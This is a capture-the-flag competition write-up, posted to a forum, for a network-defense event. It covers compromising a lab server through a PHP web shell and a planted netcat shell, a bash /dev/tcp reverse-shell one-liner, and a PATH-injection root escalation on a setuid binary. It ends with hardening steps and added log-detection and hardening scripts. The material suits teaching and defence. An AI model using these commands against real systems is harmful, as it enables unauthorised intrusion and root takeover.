15 December 2016 - 02:37:08

Cyber Network Defense (CND) - CDC 2016

Original poster (TS): Team BukanBetadin

Challenge 1 Report: Password Recovery

Executive Summary:

The server exposes many open ports. Probing port 80 produced several hints and led to a file named uselessprogram that is setuid root (listed as -rwsr-sr-x root root, i.e. setuid and setgid root). The program runs a shell command by its relative name, so it is vulnerable to PATH injection. The shell listening on port 38129 gave a remote shell with the apache user's permissions. To reach root, PATH was pointed at /tmp and /tmp/cat was made a script that runs /bin/sh; running uselessprogram then gave a root shell.

Detailed Report:

1. Find the server IP

BukanBetadin xpl # ./ipscanner 172.17.2.0
172.17.2.1 ONLINE
172.17.2.3 ONLINE


2. Port scan: not needed. Went straight to the ports listed in the challenge document.

3. Test HTTP OPTIONS

BukanBetadin arca # nc -vv 172.17.2.3 80
Connection to 172.17.2.3 80 port [tcp/http] succeeded!
OPTIONS / HTTP/1.0
HOST: LOCALHOST
ACCEPT: */*
user-agent: firefox/5

HTTP/1.1 200 OK
Date: Tue, 29 Nov 2016 20:38:36 GMT
Server: Apache/2.4.6 (CentOS) PHP/5.4.16
Allow: GET,HEAD,POST,OPTIONS,TRACE
Content-Length: 0
Connection: close
Content-Type: httpd/unix-directory

BukanBetadin arca #

The Allow header shows that TRACE is enabled as well as OPTIONS; turning it off (TraceEnable Off) belongs with the httpd hardening in Challenge 2.


4. view-source:http://172.17.2.3/info.php


The error messages below leak the parameter name: info.php passes $_GET["command"] to system(), so a request without that parameter triggers the "Undefined index: command" notice and the "Cannot execute a blank command" warning, both hidden inside a display:none div.

<div style="display: none;"><br />
<b>Notice</b>:  Undefined index: command in <b>/var/www/html/info.php</b> on line <b>5</b><br />
<br />
<b>Warning</b>:  system(): Cannot execute a blank command in <b>/var/www/html/info.php</b> on line <b>5</b><br />
bool(false)
</div><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>


5. Test a command: http://172.17.2.3/info.php?command=dir

Result: the command is executed (backdoor found).

<div style="display: none;">info.php  peralatan  uploads
string(28) "info.php  peralatan  uploads"
</div>
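As an added example that is not part of the original report, here is the detection logic a defender could run over the Apache access log to spot the kind of web shell found in steps 4 and 5 (it also serves the "connection monitoring" item in Challenge 2). The log lines are constructed to mirror the requests in this write-up in the stock "combined" LogFormat; the tag names and the rule set are this example's own choices.

```shell
#!/bin/sh
# Added example (not part of the original report): access-log detection for
# the info.php?command= web shell found in steps 4-5. The log lines are
# constructed to mirror the requests in this write-up; the tags and rules
# are this example's own choices.

# Writes the constructed sample access_log (Apache "combined" format) to a
# temp file and prints its path.
write_sample_log() {
    f=$(mktemp)
    cat > "$f" <<'EOF'
172.17.2.231 - - [29/Nov/2016:20:40:01 +0000] "GET /info.php?command=dir HTTP/1.1" 200 231 "-" "Mozilla/5.0"
172.17.2.231 - - [29/Nov/2016:20:40:09 +0000] "GET /info.php?command=ls%20-la%20peralatan HTTP/1.1" 200 512 "-" "Mozilla/5.0"
172.17.1.50 - - [29/Nov/2016:20:42:00 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
172.17.1.50 - - [29/Nov/2016:20:42:05 +0000] "OPTIONS / HTTP/1.0" 200 0 "-" "firefox/5"
172.17.2.231 - - [29/Nov/2016:20:43:10 +0000] "GET /info.php?command=cat%20/var/www/html/peralatan/notes.txt HTTP/1.1" 200 700 "-" "Mozilla/5.0"
172.17.2.231 - - [29/Nov/2016:20:45:00 +0000] "POST /peralatan/uploader.php HTTP/1.1" 200 88 "-" "Mozilla/5.0"
172.17.1.50 - - [29/Nov/2016:20:46:00 +0000] "GET /search.php?q=hello%20world HTTP/1.1" 200 300 "-" "Mozilla/5.0"
EOF
    echo "$f"
}

# Classifies one log line. Prints a tag and returns 0 when the request looks
# like web-shell use or recon; returns 1 (prints nothing) otherwise.
# Rules, in priority order:
#   rce-parameter  : query parameter named command/cmd/exec (the info.php backdoor)
#   shell-metachar : encoded or raw ; | & ` $( in the query (command chaining)
#   upload-path    : requests to uploader.php or to .php files under /uploads/
#   probe-method   : OPTIONS/TRACE probes like the nc session in step 3
# A plain %20 (space) on its own is deliberately not a hit, see the last log line.
classify_request() {
    req=${1#*\"}; req=${req%%\"*}            # text between the first pair of quotes
    method=${req%% *}
    target=${req#* }; target=${target%% *}    # URL path plus query string
    query=${target#*\?}
    [ "$query" = "$target" ] && query=""      # no '?' present
    case "$query" in
        command=*|*"&command="*|cmd=*|*"&cmd="*|exec=*|*"&exec="*) echo rce-parameter; return 0 ;;
    esac
    case "$query" in
        *%3[bB]*|*%7[cC]*|*%26*|*%60*|*%24%28*|*";"*|*"|"*|*'`'*|*'$('*) echo shell-metachar; return 0 ;;
    esac
    case "$target" in
        */uploader.php*|*/uploads/*.php*) echo upload-path; return 0 ;;
    esac
    case "$method" in
        OPTIONS|TRACE) echo probe-method; return 0 ;;
    esac
    return 1
}

# Prints "tag client request" for every flagged line of the log file $1.
audit_log() {
    while IFS= read -r line; do
        tag=$(classify_request "$line") || continue
        client=${line%% *}
        req=${line#*\"}; req=${req%%\"*}
        printf '%s %s %s\n' "$tag" "$client" "$req"
    done < "$1"
}

# Number of flagged requests in log file $1.
count_flagged() { audit_log "$1" | awk 'END { print NR }'; }

# Flagged requests per client IP, one "ip count" per line, sorted by IP.
flagged_sources() {
    audit_log "$1" | awk '{ n[$2]++ } END { for (ip in n) print ip, n[ip] }' | sort
}

# Demo when run directly.
log=$(write_sample_log)
audit_log "$log"
echo "flagged: $(count_flagged "$log") of $(awk 'END { print NR }' "$log") requests"
flagged_sources "$log"
rm -f "$log"
```

On the sample, five of the seven requests are flagged (three command= calls, the OPTIONS probe and the uploader POST), and the per-client summary puts 172.17.2.231 on top; the harmless search.php?q=hello%20world request is not flagged, which is why the metacharacter rule does not fire on %20 alone.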

6. Check the current directory (command=pwd)

string(13) "/var/www/html"

7. List the current directory (command=ls -la)

total 8
drwxr-xr-x. 5 root   root    84 Nov 21 13:24 .
drwxr-xr-x. 4 root   root    31 Nov 20 23:47 ..
-rw-------. 1 root   apache  77 Nov 21 13:28 .bash_history
drwxr-xr-x. 2 root   root    27 Nov 20 23:20 .trash
-rw-r--r--. 1 root   root   176 Nov 21 00:02 info.php
drwxr-xr-x. 2 root   root    67 Nov 21 00:37 peralatan
drwxr-xr-x. 2 apache apache   6 Nov 21 00:26 uploads
string(52) "drwxr-xr-x. 2 apache apache   6 Nov 21 00:26 uploads"


8. http://172.17.2.3/info.php?command=ls -la peralatan

drwxr-xr-x. 2 root root    67 Nov 21 00:37 .
drwxr-xr-x. 5 root root    84 Nov 21 13:24 ..
-rw-r--r--. 1 root root 25304 Nov 20 21:33 linuxprivchecker.py
-rw-r--r--. 1 root root   484 Nov 21 12:01 notes.txt
-rw-r--r--. 1 root root   700 Nov 21 00:22 uploader.php
string(55) "-rw-r--r--. 1 root root   700 Nov 21 00:22 uploader.php"


There is an uploader (uploader.php), alongside a privilege-escalation checker (linuxprivchecker.py) and a notes file.

9. view-source:http://172.17.2.3/info.php?command=cat%20/var/www/html/peralatan/notes.txt

It contains this message:

<div style="display: none;">I still can't get a shell to run from the webserver. This PHP setup is seriously tough.

So in the end I planted a netcat shell. Sorry, had to, I needed a shell.

+ Worst part: I forgot where I put the netcat shell, but relax, it doesn't run as root.

Have a look, delete it if you need to, I'm worried a hacker will use it.

And one more thing, what is that .trash folder, bro?

--ADMIN REPLY--

No problem, as long as it's not a root shell.

The .trash folder is my kid's application. He's just started learning programming.

string(0) ""
</div>

10. List the directory: view-source:http://172.17.2.3/info.php?command=ls%20-la%20/var/www/html/.trash

The following program was found:

<div style="display: none;">total 0
drwxr-xr-x. 2 root root 27 Nov 20 23:20 .
drwxr-xr-x. 5 root root 84 Nov 21 13:24 ..
??????????? ? ?    ?     ?            ? uselessprogram
string(54) "??????????? ? ?    ?     ?            ? uselessprogram"
</div>


The metadata columns show "?" because ls could read the directory entry but could not stat the file from the web shell; the same listing from the port 38129 shell in step 14 shows the full mode. An upload through uploader.php was also tried and failed.

11. Try other ports. Port 1337/udp answers every line with an empty "Server Reply:".

BukanBetadin arca # nc -vvu 172.17.2.3 1337
Connection to 172.17.2.3 1337 port [udp/*] succeeded!
Server Reply:
Server Reply:
Server Reply:
Server Reply:
Server Reply: 

12. Try again, chaining commands with ";".

BukanBetadin arca # nc -vvu 172.17.2.3 1337
Connection to 172.17.2.3 1337 port [udp/*] succeeded!
Server Reply:
Server Reply:
Server Reply:
Server Reply:
Server Reply:
ls
Server Reply:
dir
Server Reply:
dir; ls;
[IDS ALERT] Kamu pintar, coba ssh dengan credential nakal:nakal12345

Got the credentials nakal:nakal12345.

Tried them: it is a honeypot. The login prints a cowsay banner and immediately closes the connection (two attempts shown).

BukanBetadin arca # ssh nakal@172.17.2.3
nakal@172.17.2.3's password:
Last login: Tue Nov 29 09:33:25 2016 from 172.17.1.222
 _________________
< Ih nakal! >
 -----------------
        \   ^__^
         \  (oo)\_______
            (__)\       )\/\
                ||----w |
                ||     ||
Connection to 172.17.2.3 closed.
BukanBetadin arca # ssh nakal@172.17.2.3
nakal@172.17.2.3's password:
Last login: Wed Nov 30 04:03:13 2016 from 172.17.2.231
 _________________
< Ih nakal! >
 -----------------
        \   ^__^
         \  (oo)\_______
            (__)\       )\/\
                ||----w |
                ||     ||
Connection to 172.17.2.3 closed.
BukanBetadin arca # 


13. Try the other port. Port 38129/udp is the netcat shell from the note: whatever is sent is executed and the output comes back (dir gives nothing, ls works).

BukanBetadin arca # nc -vvu 172.17.2.3 38129
Connection to 172.17.2.3 38129 port [udp/*] succeeded!
dir
ls
info.php
peralatan
uploads
ls -la
total 8
drwxr-xr-x. 5 root   root    84 Nov 21 13:24 .
drwxr-xr-x. 4 root   root    31 Nov 20 23:47 ..
-rw-------. 1 root   apache  77 Nov 21 13:28 .bash_history
-rw-r--r--. 1 root   root   176 Nov 21 00:02 info.php
drwxr-xr-x. 2 root   root    67 Nov 21 00:37 peralatan
drwxr-xr-x. 2 root   root    27 Nov 20 23:20 .trash
drwxr-xr-x. 2 apache apache   6 Nov 21 00:26 uploads
cd .trash

14. Following the earlier hint, go into .trash and look at uselessprogram. From this shell ls -la does show the metadata: -rwsr-sr-x root root, i.e. setuid and setgid root. (The "cat .trash" line was typed by mistake and produced nothing.)

cd .trash
pwd
/var/www/html/.trash
cat .trash

dir
uselessprogram
ls -la
total 12
drwxr-xr-x. 2 root root   27 Nov 20 23:20 .
drwxr-xr-x. 5 root root   84 Nov 21 13:24 ..
-rwsr-sr-x. 1 root root 8656 Nov 20 23:17 uselessprogram

15. Reverse shell. Through the port 38129 shell, send the bash /dev/tcp one-liner back to the attacking host (172.17.2.231):

/bin/bash -i >& /dev/tcp/172.17.2.231/9090 0>&1

and the listener on 172.17.2.231 receives the connection:

arca@BukanBetadin ~ $ nc -vlp 9090
Listening on [0.0.0.0] (family 0, port 9090)

Connection from [172.17.2.3] port 9090 [tcp/*] accepted (family 2, sport 55798)
bash: no job control in this shell
bash-4.2$
bash-4.2$ 

16. Spawn /bin/bash through a pty for a more interactive shell. id confirms the shell runs as apache (uid 48) in the SELinux initrc_t context.

bash-4.2$ python -c "import pty; pty.spawn('/bin/bash');"
python -c "import pty; pty.spawn('/bin/bash');"
bash-4.2$ id
id
uid=48(apache) gid=48(apache) groups=48(apache) context=system_u:system_r:initrc_t:s0

17. Run uselessprogram from the interactive shell; it prints /etc/passwd.

bash-4.2$ ./uselessprogram
./uselessprogram
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
avahi-autoipd:x:170:170:Avahi IPv4LL Stack:/var/lib/avahi-autoipd:/sbin/nologin
systemd-bus-proxy:x:999:997:systemd Bus Proxy:/:/sbin/nologin
systemd-network:x:998:996:systemd Network Management:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
polkitd:x:997:995:User for polkitd:/:/sbin/nologin
tss:x:59:59:Account used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
chrony:x:996:994::/var/lib/chrony:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
udpsecret:x:1001:1001::/home/udpsecret:/bin/bash
apache:x:48:48:Apache:/var/www/html:/bin/bash
mysql:x:27:27:MariaDB Server:/var/lib/mysql:/sbin/nologin
squid:x:23:23::/var/spool/squid:/sbin/nologin
imap:x:1002:1002::/home/imap:/bin/bash
system:x:1003:1003::/home/system:/bin/bash
nakal:x:1004:1004::/home/nakal:/bin/bash
tcpdump:x:72:72::/:/sbin/nologin

18. Analyse the strings in the uselessprogram binary (the first attempt typed "string" instead of "strings").

bash-4.2$ string uselessprogram
string uselessprogram
bash: string: command not found
bash-4.2$ strings uselessprogram
strings uselessprogram
/lib64/ld-linux-x86-64.so.2
GI:1
libc.so.6
setuid
system
__libc_start_main
__gmon_start__
GLIBC_2.2.5
UH-@
AWAVA
AUATL
[]A\A]A^A_
cat /etc/passwd
;*3$"
GCC: (Ubuntu 5.4.0-6ubuntu1~16.04.4) 5.4.0 20160609
crtstuff.c
__JCR_LIST__
deregister_tm_clones
__do_global_dtors_aux
completed.7585
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
useless.c
__FRAME_END__
__JCR_END__
__init_array_end
_DYNAMIC
__init_array_start
__GNU_EH_FRAME_HDR
_GLOBAL_OFFSET_TABLE_
__libc_csu_fini
_ITM_deregisterTMCloneTable
_edata
system@@GLIBC_2.2.5
__libc_start_main@@GLIBC_2.2.5
__data_start
__gmon_start__
__dso_handle
_IO_stdin_used
__libc_csu_init
__bss_start
main
_Jv_RegisterClasses
__TMC_END__
_ITM_registerTMCloneTable
setuid@@GLIBC_2.2.5
.symtab
.strtab
.shstrtab
.interp
.note.ABI-tag
.note.gnu.build-id
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rela.dyn
.rela.plt
.init
.plt.got
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.jcr
.dynamic
.got.plt
.data
.bss
.comment


The bug is visible in the strings: the binary imports setuid and system, and its only command string is "cat /etc/passwd". system() runs that string through /bin/sh -c, which looks up "cat" in the PATH inherited from whoever runs the program, and because the binary is setuid root, whatever "cat" resolves to runs with root privileges. Controlling PATH therefore controls what runs as root.

19. Exploit the bug. The first attempt copies /bin/sh to /tmp/sh and sets PATH=/tmp, which does nothing: the program runs "cat", so the file in /tmp has to be named cat. The copy is then made as /tmp/cat.

bash-4.2$ cp /bin/sh /tmp/sh
cp /bin/sh /tmp/sh
bash-4.2$ export PATH=/tmp
export PATH=/tmp
bash-4.2$ echo $PATH
echo $PATH
/tmp
bash-4.2$ ./uselessprogram

bash-4.2$ /bin/cp /bin/sh /tmp/cat
/bin/cp /bin/sh /tmp/cat
bash-4.2$ /bin/ls -la /tmp
/bin/ls -la /tmp
total 944
drwxrwxrwt.  7 root   root       98 Nov 30 04:16 .
dr-xr-xr-x. 17 root   root     4096 Nov 20 18:15 ..
-rwxr-xr-x.  1 apache apache 960392 Nov 30 04:16 cat
drwxrwxrwt.  2 root   root        6 Nov 20 18:10 .font-unix
drwxrwxrwt.  2 root   root        6 Nov 20 18:10 .ICE-unix
drwxrwxrwt.  2 root   root        6 Nov 20 18:10 .Test-unix
drwxrwxrwt.  2 root   root        6 Nov 20 18:10 .X11-unix
drwxrwxrwt.  2 root   root        6 Nov 20 18:10 .XIM-unix
bash-4.2$

bash-4.2$ /bin/cp /bin/sh /tmp/cat
/bin/cp /bin/sh /tmp/cat
bash-4.2$ /bin/ls -la /tmp
/bin/ls -la /tmp
total 1884
drwxrwxrwt.  7 root   root      107 Nov 30 04:21 .
dr-xr-xr-x. 17 root   root     4096 Nov 20 18:15 ..
-rwxr-xr-x.  1 apache apache 960392 Nov 30 04:21 cat
drwxrwxrwt.  2 root   root        6 Nov 20 18:10 .font-unix
drwxrwxrwt.  2 root   root        6 Nov 20 18:10 .ICE-unix
-rwxr-xr-x.  1 apache apache 960392 Nov 30 04:20 sh
drwxrwxrwt.  2 root   root        6 Nov 20 18:10 .Test-unix
drwxrwxrwt.  2 root   root        6 Nov 20 18:10 .X11-unix
drwxrwxrwt.  2 root   root        6 Nov 20 18:10 .XIM-unix
bash-4.2$ pwd
pwd
/var/www/html/.trash
bash-4.2$ 

20. Make /tmp/cat a script that runs a shell. A plain copy of /bin/sh named cat is started as "cat /etc/passwd" and tries to execute the passwd file as a script, so a wrapper that ignores its argument and runs /bin/sh is used instead (shown here from the root shell obtained afterwards):

[root@capture-defense tmp]# cat /tmp/cat
#!/bin/bash

/bin/sh

[root@capture-defense tmp]# 
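To show what steps 18 to 20 rely on, here is an added example that is not part of the team's report: an unprivileged shell stand-in for uselessprogram. It reproduces system("cat <file>") as /bin/sh -c with a caller-supplied PATH, shows why a shell named cat fails (it is handed the passwd file as a script and exits 127), shows the wrapper trick working, and then a hardened form (absolute command path plus a clean environment) that ignores the poisoned PATH. The one-line passwd fixture, the temporary directory and the /bin/sh and /bin/cat paths are this example's assumptions.

```shell
#!/bin/sh
# Added example, not from the team's report: an unprivileged stand-in for the
# PATH injection in uselessprogram. The real binary did roughly
#     setuid(0); system("cat /etc/passwd");
# and system() hands that string to /bin/sh -c, so "cat" is resolved through
# the PATH inherited from whoever runs the binary. Everything below runs as the
# current user on a constructed passwd-style file in a temporary directory.

# Constructed fixture: a one-line stand-in for /etc/passwd. Prints the dir.
make_fixture() {
    dir=$(mktemp -d)
    printf 'root:x:0:0:root:/root:/bin/bash\n' > "$dir/passwd"
    echo "$dir"
}

# Stand-in for system("cat <file>") with the caller's PATH ($1) in effect.
# The command string is fixed, but where "cat" comes from is not.
run_like_system() {
    PATH="$1" /bin/sh -c "cat $2" 2>/dev/null
}

# Step 19, first idea: a shell named "cat" does not help, because it is
# started as `cat <file>` and tries to run the passwd file as a script, which
# fails with exit status 127. Prints that status. (A wrapper rather than a
# literal copy of /bin/sh, so the example behaves the same on busybox systems.)
copied_shell_status() {
    dir=$(make_fixture)
    printf '#!/bin/sh\nexec /bin/sh "$@"\n' > "$dir/cat"
    chmod 755 "$dir/cat"
    status=0
    run_like_system "$dir" "$dir/passwd" || status=$?
    rm -rf "$dir"
    echo "$status"
}

# Step 20, what worked: a wrapper named "cat" that ignores its argument and
# runs whatever the attacker wants. The report's wrapper ran /bin/sh; this one
# just proves it was reached.
hijacked_output() {
    dir=$(make_fixture)
    printf '#!/bin/sh\necho HIJACKED\n' > "$dir/cat"
    chmod 755 "$dir/cat"
    out=$(run_like_system "$dir" "$dir/passwd")
    rm -rf "$dir"
    echo "$out"
}

# Hardened stand-in: absolute path for the command and a clean environment,
# so the caller's PATH ($1, deliberately unused) is irrelevant. For the binary
# this means clearing the environment and calling /bin/cat by full path, or
# better, not using system() at all.
run_hardened() {
    env -i PATH=/usr/bin:/bin /bin/sh -c '/bin/cat "$1"' sh "$2"
}

# Same poisoned directory as before, but the hardened form reads the file.
hardened_output() {
    dir=$(make_fixture)
    printf '#!/bin/sh\necho HIJACKED\n' > "$dir/cat"
    chmod 755 "$dir/cat"
    out=$(run_hardened "$dir" "$dir/passwd")
    rm -rf "$dir"
    echo "$out"
}

# Demo when run directly.
echo "shell named cat      -> exit status $(copied_shell_status)"
echo "wrapper named cat    -> $(hijacked_output)"
echo "hardened invocation  -> $(hardened_output)"
```

The same three runs map onto the report: the first is why step 19 showed nothing useful, the second is the /tmp/cat wrapper of step 20, and the third is what uselessprogram would have to do for PATH to stop mattering. Note that the real program also has to keep its setuid(0) for the shell in the wrapper to come up as root, which is what the id output in step 21 shows.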

21. Then change the root password. The first id output shows uid=0 but gid=1003(system) and an unconfined SELinux context, unlike the apache reverse shell (initrc_t), so this run was evidently made from a different login session, which the report does not show. passwd is "command not found" at first because PATH is still /tmp; restoring PATH fixes that.

uid=0(root) gid=1003(system) groups=1003(system) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
sh-4.2# /bin/bash
/usr/libexec/grepconf.sh: line 5: grep: command not found
sh-4.2# passwd root
sh: passwd: command not found
sh-4.2# export PATH=/usr/local/bin:/usr/bin:/usr/local/sbin:/usr/sbin:/home/system/.local/bin:/home/system/bin
sh-4.2# /bin/bash
         (__)
         (oo)
   /------\/
  / |    ||   
 *  /\---/\
    ~~   ~~   
...."Have you mooed today?"...
[root@capture-defense tmp]# id
uid=0(root) gid=1003(system) groups=1003(system) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[root@capture-defense tmp]# pwd
/tmp
[root@capture-defense tmp]# passwd
Changing password for user root.
New password:
Retype new password:
passwd: all authentication tokens updated successfully.
[root@capture-defense tmp]# 

22. Test root access over SSH

BukanBetadin xpl # ssh root@172.17.2.3
root@172.17.2.3's password:
Last login: Wed Nov 30 04:19:22 2016 from 172.17.1.100
[root@capture-defense ~]# id
uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[root@capture-defense ~]# 

Challenge 2 Report (Defence): System Recovery, Hardening & Network Perimeter

Executive Summary:

Patched the server's weaknesses in vsftpd, httpd, squid and the /root permissions, and stopped uselessprogram from running as root.

Detailed Report:

1. Patch the port 80 bug in info.php: the system() call on $_GET["command"] and its hidden div are commented out, leaving phpinfo(). phpinfo() still discloses the server configuration, so removing the file entirely would be the cleaner fix.

<?php
error_reporting(-1);
ini_set('display_errors', 'Off');
#echo '<div style="display: none;">';
#echo var_dump(system($_GET["command"], $retval));
#echo '</div>';
phpinfo();
?>

2. Patch the uselessprogram executable: remove the setuid/setgid bits so it no longer runs as root.
3. Patch vsftpd: disable anonymous login.

anonymous_enable=NO

4. Patch squid: disable the "allow localhost" rule.
5. Remove read access for other users on /root.
6. Make /tmp non-writable. (Many services expect a writable /tmp; mounting it noexec, or fixing the binary's PATH use, closes this particular escalation with less breakage.)
7. Clean out the backdoors: the info.php web shell and the netcat shell on port 38129.
8. Connection monitoring.

Challenge 3 Report: Attacking

List the teams whose servers you successfully compromised and took over.

1. IP address: 172.17.10.3
   Bug: port 38129
   Exploitation technique: command injection through the netcat shell

2. IP address: 172.17.11.3
   Bug: port 38129

3. IP address: 172.17.5.3
   Bug: port 38129

EOF